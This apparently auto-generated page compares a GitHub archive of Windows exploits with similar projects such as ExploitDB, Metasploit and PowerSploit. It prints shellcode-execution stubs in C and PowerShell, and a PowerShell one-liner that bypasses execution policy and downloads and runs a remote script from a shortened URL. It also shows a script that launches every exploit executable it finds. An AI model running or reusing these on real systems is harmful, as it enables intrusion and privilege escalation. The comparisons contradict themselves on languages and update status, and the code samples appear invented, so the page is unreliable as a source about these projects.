Convert Figma logo to code with AI

WindowsExploits logoExploits

Windows Exploits

1,254
535
1,254
11

Top Related Projects

The legacy Exploit Database repository - New repo located at https://gitlab.com/exploit-database/exploitdb

windows-kernel-exploits Windows平台提权漏洞集合

Windows exploits, mostly precompiled. Not being updated. Check https://github.com/SecWiki/windows-kernel-exploits instead.

This tool compares a targets patch levels against the Microsoft vulnerability database in order to detect potential missing patches on the target. It also notifies the user if there are public exploits and Metasploit modules available for the missing bulletins.

Metasploit Framework

PowerSploit - A PowerShell Post-Exploitation Framework

Quick Overview

WindowsExploits/Exploits is a GitHub repository containing a collection of Windows exploits and proof-of-concept code for various vulnerabilities. It serves as a resource for security researchers, penetration testers, and system administrators to understand and test Windows security vulnerabilities.

Pros

  • Comprehensive collection of Windows exploits in one place
  • Includes both older and newer vulnerabilities
  • Useful for security research and testing purposes
  • Regularly updated with new exploits

Cons

  • Potential for misuse by malicious actors
  • Some exploits may be outdated or patched in newer Windows versions
  • Limited documentation for some exploits
  • May require advanced knowledge to use effectively

Getting Started

As this is not a code library but a collection of exploits, there's no specific getting started guide. However, users should follow these general steps:

  1. Clone the repository: git clone https://github.com/WindowsExploits/Exploits.git
  2. Navigate to the desired exploit folder
  3. Read the accompanying documentation (if available)
  4. Compile the exploit code if necessary
  5. Use the exploit in a controlled, ethical environment for testing or research purposes

Note: Always ensure you have proper authorization and are operating within legal boundaries when using these exploits.

Competitor Comparisons

The legacy Exploit Database repository - New repo located at https://gitlab.com/exploit-database/exploitdb

Pros of ExploitDB

  • Larger and more comprehensive database of exploits
  • Regularly updated with new exploits and vulnerabilities
  • Includes exploits for multiple operating systems and platforms

Cons of ExploitDB

  • May require more filtering to find Windows-specific exploits
  • Larger repository size, potentially slower to clone or search

Code Comparison

ExploitDB example (Python):

#!/usr/bin/python
import sys
import struct
import time

Exploits example (PowerShell):

$ErrorActionPreference = "SilentlyContinue"
$vulnAMSI = @"
using System;
using System.Runtime.InteropServices;
"@

Summary

ExploitDB is a more extensive repository covering various platforms, while Exploits focuses specifically on Windows vulnerabilities. ExploitDB offers a broader range of exploits and regular updates, making it suitable for diverse security research. However, its size may make it less convenient for those solely interested in Windows exploits.

Exploits, being Windows-centric, provides a more targeted collection of exploits and may be easier to navigate for Windows-specific research. The code examples show that ExploitDB often includes Python scripts, while Exploits tends to use PowerShell, reflecting their different focus areas.

Both repositories serve valuable purposes in the security community, with ExploitDB offering breadth and Exploits providing depth in Windows exploitation.

windows-kernel-exploits Windows平台提权漏洞集合

Pros of windows-kernel-exploits

  • More comprehensive collection of Windows kernel exploits
  • Better organized with clear categorization by Windows version
  • Includes detailed descriptions and usage instructions for each exploit

Cons of windows-kernel-exploits

  • Less frequently updated compared to Exploits
  • Fewer contributors and community engagement
  • Some exploits may be outdated or no longer applicable to current Windows versions

Code Comparison

windows-kernel-exploits:

# MS16-032 Secondary Logon Handle Privilege Escalation
$code = @"
[DllImport("kernel32.dll")]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
"@

Exploits:

# MS17-010 EternalBlue SMB Remote Code Execution
buf = "\x00\x00\x00\x54" # Session Setup AndX request
buf += "\xff\x53\x4d\x42" # SMB header
buf += "\x72\x00\x00\x00" # NT status

Both repositories provide valuable resources for security researchers and penetration testers. windows-kernel-exploits offers a more extensive collection of Windows kernel exploits with better organization and documentation. However, Exploits tends to be more frequently updated and has a more active community. The code examples demonstrate the different approaches and programming languages used in each repository, with windows-kernel-exploits focusing on PowerShell and Exploits utilizing Python for exploit development.

Windows exploits, mostly precompiled. Not being updated. Check https://github.com/SecWiki/windows-kernel-exploits instead.

Pros of WindowsExploits

  • More comprehensive collection of Windows exploits
  • Better organized with clear categorization by Windows version
  • Includes additional resources like exploit databases and tools

Cons of WindowsExploits

  • Less frequently updated compared to WindowsExploits/Exploits
  • Fewer contributors and community engagement
  • Some exploits may be outdated or no longer applicable

Code Comparison

WindowsExploits:

# Example exploit code
$shellcode = [System.Convert]::FromBase64String("...")
$size = $shellcode.Length

$addr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($size)
[System.Runtime.InteropServices.Marshal]::Copy($shellcode, 0, $addr, $size)

Exploits:

// Example exploit code
#include <windows.h>

int main() {
    char shellcode[] = "...";
    void *exec = VirtualAlloc(0, sizeof shellcode, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    memcpy(exec, shellcode, sizeof shellcode);
    ((void(*)())exec)();
    return 0;
}

Both repositories provide valuable resources for Windows exploit research and development. WindowsExploits offers a more extensive collection with better organization, while Exploits may have more recent updates and active community involvement. The code examples demonstrate different approaches to shellcode execution, with WindowsExploits using PowerShell and Exploits using C.

This tool compares a targets patch levels against the Microsoft vulnerability database in order to detect potential missing patches on the target. It also notifies the user if there are public exploits and Metasploit modules available for the missing bulletins.

Pros of Windows-Exploit-Suggester

  • Provides a more comprehensive analysis of Windows vulnerabilities
  • Offers suggestions for potential exploits based on system information
  • Regularly updated to include the latest vulnerability data

Cons of Windows-Exploit-Suggester

  • Requires more setup and configuration to use effectively
  • May produce false positives or irrelevant suggestions
  • Lacks ready-to-use exploit code for immediate deployment

Code Comparison

Windows-Exploit-Suggester:

def main():
    args = parse_args()
    if args.update:
        update_databases()
    if args.systeminfo:
        parse_systeminfo(args.systeminfo)
    suggest_exploits()

Exploits:

$exploits = Get-ChildItem -Path ".\Exploits" -Recurse -Filter "*.exe"
foreach ($exploit in $exploits) {
    Write-Host "Running $($exploit.Name)..."
    & $exploit.FullName
}

The Windows-Exploit-Suggester code focuses on analyzing system information and suggesting potential exploits, while the Exploits repository contains a simple script to execute available exploit executables directly.

Metasploit Framework

Pros of metasploit-framework

  • Comprehensive framework with a vast array of exploits, payloads, and auxiliary modules
  • Active development and regular updates from a large community
  • Extensive documentation and support resources

Cons of metasploit-framework

  • Steeper learning curve due to its complexity and extensive features
  • Larger footprint and resource requirements
  • May be overkill for simple, targeted Windows exploit tasks

Code Comparison

Exploits:

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://bit.ly/L3g1tCrad1e'); Invoke-MS16-032"

metasploit-framework:

use exploit/windows/local/ms16_032_secondary_logon_handle_privesc
set SESSION 1
set LHOST 192.168.1.100
set LPORT 4444
exploit

The Exploits repository provides simple, direct PowerShell commands for specific Windows exploits, while metasploit-framework offers a more structured approach with modular exploit selection and configuration options. Metasploit's code is more verbose but provides greater flexibility and integration with other framework components.

PowerSploit - A PowerShell Post-Exploitation Framework

Pros of PowerSploit

  • More comprehensive and actively maintained PowerShell-based post-exploitation framework
  • Includes a wider range of tools for various stages of penetration testing
  • Better documentation and community support

Cons of PowerSploit

  • Primarily focused on PowerShell, limiting its use in non-PowerShell environments
  • May be more complex to use for beginners compared to simpler exploit collections

Code Comparison

PowerSploit example (Get-GPPPassword function):

function Get-GPPPassword {
    [CmdletBinding()]
    Param (
        [Parameter(Mandatory=$false,
        HelpMessage="Credentials to use when connecting to a Domain Controller.")]
        [System.Management.Automation.PSCredential]
        [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty
    )
    # ... (additional code)
}

Exploits example (MS16-032 exploit):

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

HANDLE hEvent;
// ... (additional code)

The code comparison shows that PowerSploit focuses on PowerShell scripting, while Exploits contains various exploit implementations in different languages, including C.

Convert Figma logo designs to code with AI

Visual Copilot

Introducing Visual Copilot: A new AI model to turn Figma designs to high quality code using your components.

Try Visual Copilot

README

Windows Exploits

A curated archive of complied and tested public Windows exploits.